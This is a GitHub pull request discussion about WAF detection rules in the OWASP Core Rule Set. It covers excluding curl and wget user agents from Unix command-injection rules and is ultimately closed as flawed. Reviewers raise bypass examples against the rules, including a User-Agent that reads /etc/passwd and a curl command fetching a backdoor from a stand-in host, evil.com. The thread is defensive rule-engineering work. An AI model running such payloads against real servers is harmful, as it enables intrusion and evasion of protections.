fix: exclude well known user agents from unix commands by theseion · Pull Request #3190 · coreruleset/coreruleset · GitHub

fix: exclude well known user agents from unix commands #3190


Conversation

theseion
Contributor
@theseion theseion commented Apr 4, 2023

User agents like curl and wget currently lead to false positives because they are valid in User-Agent headers.
This commit moves the matching against the User-Agent header out of rule 932236 and into a separate rule, 932238, so that words like curl and wget are still treated as attacks in other payloads but can be excluded from the User-Agent header checks.

In addition, the well-known user agents are also excluded from rule 932237, which only matches against Referer and User-Agent. An additional rule was omitted for simplicity's sake.

Fixes #3189.
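
For illustration, a minimal sketch of the split described above. The rule IDs come from this PR, but the variable lists, the regex, and the actions below are simplified placeholders rather than the actual CRS definitions:

# 932236 (sketch): command words keep matching in request payloads
SecRule REQUEST_FILENAME|ARGS_NAMES|ARGS "@rx \b(?:curl|wget)\b" \
    "id:932236,phase:2,block,t:none,t:lowercase,\
    msg:'Remote Command Execution: Unix command found in request payload'"

# 932238 (sketch): the same command words, matched only against the
# User-Agent header, so well-known agents can be excluded here without
# weakening the payload checks in 932236
SecRule REQUEST_HEADERS:User-Agent "@rx \b(?:curl|wget)\b" \
    "id:932238,phase:2,block,t:none,t:lowercase,\
    msg:'Remote Command Execution: Unix command found in User-Agent header'"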

@theseion theseion requested review from dune73, franbuehler and a team April 4, 2023 20:13
@theseion theseion force-pushed the 3189-do-not-match-curl-and-wget-in-user-agent-header branch 2 times, most recently from 8fba43a to 257975c on April 5, 2023 05:16
@emphazer
Contributor
emphazer commented Apr 5, 2023

Hey Max, that looks like a great fix!
I will check it out!
Thanks!

@dune73
Member
dune73 commented Apr 5, 2023

This looks good to me, but I did not really check the details or whether the tests were shifted correctly. Somebody should do that before we merge.

@theseion
Contributor Author

I've rewritten this PR to use a more flexible approach. I didn't like that the exclusion also affected other targets.


@theseion
Contributor Author

@dune73 @emphazer I'd appreciate it if you would take another look at this one.

@theseion theseion force-pushed the 3189-do-not-match-curl-and-wget-in-user-agent-header branch from c31ee53 to f1384da on April 16, 2023 13:38
@theseion
Contributor Author

@airween I've tried to fix the comment rule of secrules-parser to allow comments before a chained rule, but didn't succeed. Could you help me out?

@airween
Contributor
airween commented Apr 17, 2023

This is just a quick review and offers a workaround. We should discuss the syntax, because there isn't any restriction on comments between the parts of chained rules.

First of all, this modification fixes the secrules-parser error:

1331,1334c1331,1334
<     # Regular expression generated from regex-assembly/932239-chain1.ra.
<     # To update the regular expression run the following shell script
<     # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
<     #   crs-toolchain regex update 932239-chain1
---
> # Regular expression generated from regex-assembly/932239-chain1.ra.
> # To update the regular expression run the following shell script
> # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
> #   crs-toolchain regex update 932239-chain1
1545,1548c1545,1548
<     # Regular expression generated from regex-assembly/932238-chain1.ra.
<     # To update the regular expression run the following shell script
<     # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
<     #   crs-toolchain regex update 932238-chain1
---
> # Regular expression generated from regex-assembly/932238-chain1.ra.
> # To update the regular expression run the following shell script
> # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
> #   crs-toolchain regex update 932238-chain1

As you can see, the solution is simply to remove the whitespace from the beginning of the comment lines.

This also prevents the next possible issue: rules-check.py would be triggered by this syntax as well.

The reason is simple: rules-check.py has a test case that checks the indentation. It uses msc_pyparser's MSCWriter class, which writes comments without any indentation.

If we want to allow indentation (or rather, expect it) before comments that sit between the parts of chained rules, we have to modify msc_pyparser too.

This would not be a complicated modification, IMHO. I also started to play with secrules_parsing, but I couldn't fix this issue yet.

(This is what I tried:

@@ -157,8 +157,8 @@ Transformation:
 
         
 /* This is to take rule continuations (\\n) as comments */    
-Comment[ws='\t ']:
-    /\\\n|^\#.*$/;
+Comment[ws='\t ']:
+    /\\\n|^( |\t)*\#.*$/;

So I tried to add an optional whitespace block before the comment; unfortunately, I don't see why that doesn't work.)
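
For context, this is roughly where the generated comments end up once they are outdented: between the two parts of a chained rule, starting at column 0. The operators, actions and regex below are placeholders; the comment lines are the ones from the diff above.

SecRule REQUEST_HEADERS:User-Agent "!@pmFromFile benign-user-agents.data" \
    "id:932238,phase:2,block,t:none,chain"
# Regular expression generated from regex-assembly/932238-chain1.ra.
# To update the regular expression run the following shell script
# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
#   crs-toolchain regex update 932238-chain1
    SecRule REQUEST_HEADERS:User-Agent "@rx \b(?:curl|wget)\b"

With the comments at column 0, secrules-parser accepts the file; with leading whitespace it reports a syntax error at the comment.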

@dune73
Member
dune73 commented Apr 17, 2023

Went over it again. I still did not check the tests in detail, but it looks good to me (apart from the failing test, obviously).

@theseion
Contributor Author

Thanks @airween, I tried the same but didn't get it working. I'll just outdent the comments then.

@theseion theseion force-pushed the 3189-do-not-match-curl-and-wget-in-user-agent-header branch from 4cbaaec to aa728c2 on April 17, 2023 18:23
@airween
Contributor
airween commented Apr 17, 2023

Thanks @airween, I tried the same but didn't get it working. I'll just outdent the comments then.

Hmm... it's very weird...

$ diff REQUEST-932-APPLICATION-ATTACK-RCE_3190.conf REQUEST-932-APPLICATION-ATTACK-RCE_3190_2.conf 
1331,1334c1331,1334
<     # Regular expression generated from regex-assembly/932239-chain1.ra.
<     # To update the regular expression run the following shell script
<     # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
<     #   crs-toolchain regex update 932239-chain1
---
> # Regular expression generated from regex-assembly/932239-chain1.ra.
> # To update the regular expression run the following shell script
> # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
> #   crs-toolchain regex update 932239-chain1
1545,1548c1545,1548
<     # Regular expression generated from regex-assembly/932238-chain1.ra.
<     # To update the regular expression run the following shell script
<     # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
<     #   crs-toolchain regex update 932238-chain1
---
> # Regular expression generated from regex-assembly/932238-chain1.ra.
> # To update the regular expression run the following shell script
> # (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
> #   crs-toolchain regex update 932238-chain1

$ poetry run secrules-parser -c -f REQUEST-932-APPLICATION-ATTACK-RCE_3190.conf 
Syntax invalid: Syntax error in line 1331 col 5: Expected 'SecAction' or 'SecRuleScript' or 'SecRule' or 'SecMarker' or 'SecComponentSignature' or 'SecRuleRemoveById' or 'SecRuleRemoveBytag' or EOF at position /home/airween/src/secrules_parsing/REQUEST-932-APPLICATION-ATTACK-RCE_3190.conf:(1331, 5) => 'hain"     *# Regular '.

$ poetry run secrules-parser -c -f REQUEST-932-APPLICATION-ATTACK-RCE_3190_2.conf 
Syntax OK: REQUEST-932-APPLICATION-ATTACK-RCE_3190_2.conf

Of course, this works without any modification of secrules_parsing.

@airween
Contributor
airween commented Apr 17, 2023

I tried the same but didn't get it working. I'll just outdent the comments then.

But now the test has passed. So it works, doesn't it?

@theseion
Contributor Author

Yes, I just outdented the comments.

User agents like `curl` and `wget` currently lead to false positives
because they are valid in `User-Agent` headers.
This commit moves the matching against the `User-Agent` header out of
rule 932236 and into a separate rule, 932238, so that words like `curl`
and `wget` are still treated as attacks in other payloads but can be
excluded from the `User-Agent` header checks.

In addition, the well-known user agents are also excluded from rule
932237, which only matches against `Referer` and `User-Agent`. An
additional rule was omitted for simplicity's sake.
Instead of using `include-except` to exclude some command words, which
also affects matching against other headers, use separate rules and an
allow list with `@pmFromFile`.
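
A minimal sketch of that approach (the rule ID and actions are placeholders, and the command-word regex stands in for the generated expression): the first rule of the chain skips the check when the User-Agent is on the allow list, and the second rule applies the command-word match to the User-Agent header only.

SecRule REQUEST_HEADERS:User-Agent "!@pmFromFile benign-user-agents.data" \
    "id:932238,phase:2,block,t:none,\
    msg:'Remote Command Execution: Unix command found in User-Agent header',\
    chain"
    SecRule REQUEST_HEADERS:User-Agent "@rx \b(?:curl|wget)\b"

benign-user-agents.data would then be a plain @pmFromFile phrase list, one entry per line (e.g. curl, wget).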
@theseion theseion force-pushed the 3189-do-not-match-curl-and-wget-in-user-agent-header branch from 5bbd184 to deeb452 on April 23, 2023 18:01
@theseion
Contributor Author

I'd love some feedback on this one. @emphazer or @theMiddleBlue maybe?

@emphazer
Contributor

@theseion I already spent some time on this PR on Friday. I will give you feedback during the week ;-)

@theseion
Contributor Author

Awesome, thank you!

# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
# crs-toolchain regex update 932239-chain1
#
SecRule REQUEST_HEADERS:User-Agent "!@pmFromFile benign-user-agents.data" \
Contributor

Isn't this opening a lot of bypasses for this specific rule? Such as:

cat /etc/passwd #curl/

I know this would match other rules, but the technique could be used in a more complicated bypass.

IMO, any allow list based on the user agent (or, more generally, on user-controlled input) should be removed.

Again, my unpopular opinion is: we should not inspect UA / Referer at PL1 and PL2 without matching an injection syntax. It will always lead to FPs that are hard to exclude without removing the rule from the whole application.

Contributor Author

Yes, you are right of course. IMO, this rule is just there to filter out some basic automated attacks. If you want the real deal, you'll probably need to enable PL 3. So the question is: would users benefit from this rule, even if it is trivial to bypass?

Contributor

Yes, of course, removing FPs is a good thing, and so is blocking RCE. The problem, IMO, is that the allow list is too inclusive. As is, you'll even get unintended bypasses like curl 'http://evil.com/curl/backdoor.txt' or something similar.

Can we replace the first rule of the chain by using a regex? Something like @rx ^curl/[0-9.]+$

I see more problems with the unix-shell-* list. We match against it to prevent something like system($useragent) in the protected application, but I don't think this is something we can do at PL1 and PL2. It leads to a ton of FPs and FNs.
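
A sketch of that suggestion (rule ID, actions and the second regex are placeholders): anchoring the exclusion to a complete curl-style User-Agent such as curl/7.88.1 means that a benign token embedded in an attack payload no longer disables the check.

# Instead of skipping on any occurrence of an allow-listed word, only skip
# when the whole header looks like a plain curl client
SecRule REQUEST_HEADERS:User-Agent "!@rx ^curl/[0-9.]+$" \
    "id:932238,phase:2,block,t:none,chain"
    SecRule REQUEST_HEADERS:User-Agent "@rx \b(?:curl|wget)\b"

A User-Agent of cat /etc/passwd #curl/ or curl 'http://evil.com/curl/backdoor.txt' would then still be inspected by the second rule.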

Contributor Author

Can we replace the first rule of the chain by using a regex? Something like @rx ^curl/[0-9.]+$

Yes. Maybe that's better.

I see more problems with the unix-shell-* list. We match against it to prevent something like system($useragent) in the protected application, but I don't think this is something we can do at PL1 and PL2. It leads to a ton of FPs and FNs.

Do you mean in general or for this rule in particular? We had the unix-shell* lists before and they (sort of) worked...

Contributor

In general, I think they worked well with an acceptable FP level until we started to match against the UA and Referer request headers. This is just my opinion; I can continue to exclude UA and Referer from those rules. I'm just worried that using 4.0 at PL2 will be hard, if not impossible, for integrators.

Member

Can you guys prepare this question for the chat on Monday? I think it deserves a thorough discussion.

# (consult https://coreruleset.org/docs/development/regex_assembly/ for details):
# crs-toolchain regex update 932238-chain1
#
SecRule REQUEST_HEADERS:User-Agent "!@pmFromFile benign-user-agents.data" \
Contributor

Same here: possible rule bypass.

Contributor
@franbuehler franbuehler left a comment

There are some open issues but I think the idea behind this PR makes sense!

@RedXanadu
Member

I'm not sure the chain rule approach is a good idea, for the reasons already discussed by others.

I thought there was a crs-toolchain function to exclude unwanted keywords? Let's use that?

Or can we add a PL 3 rule, something like "Automated tooling detected", which picks up curl, wget, the Go HTTP library UA, the Perl HTTP library UA, etc., and then CRS installers can switch off the rule if they want to allow such tooling to be used?

Sorry if this is too simplistic 😅 Maybe I'm missing something.
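
For illustration, a hypothetical rule along those lines. Nothing in it is an actual CRS rule: the ID, the phrase list, the tag and the anomaly-score variables are placeholders that assume the usual CRS anomaly-scoring setup.

# Hypothetical PL 3 rule: flag well-known automated tooling by User-Agent
SecRule REQUEST_HEADERS:User-Agent "@pm curl wget go-http-client libwww-perl python-requests" \
    "id:9509100,\
    phase:1,\
    pass,\
    t:none,t:lowercase,\
    log,\
    msg:'Automated tooling detected in User-Agent header',\
    logdata:'Matched Data: %{MATCHED_VAR} found within %{MATCHED_VAR_NAME}',\
    tag:'paranoia-level/3',\
    severity:'NOTICE',\
    setvar:'tx.inbound_anomaly_score_pl3=+%{tx.notice_anomaly_score}'"

Installations that want to allow such tooling could then switch the rule off with SecRuleRemoveById.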

@franbuehler franbuehler self-assigned this Sep 4, 2023
@theseion theseion added the v4 Should go into release v4 label Sep 19, 2023
@theseion
Contributor Author

As discussed, this approach doesn't work.

@theseion theseion closed this Sep 21, 2023
@RedXanadu
Member
RedXanadu commented Sep 21, 2023

For posterity / future reference: this was picked up in #3189, go there for further discussion (correct me if I'm wrong).

Labels
v4 Should go into release v4
Development

Successfully merging this pull request may close these issues.

curl and wget are matched in User-Agent header
7 participants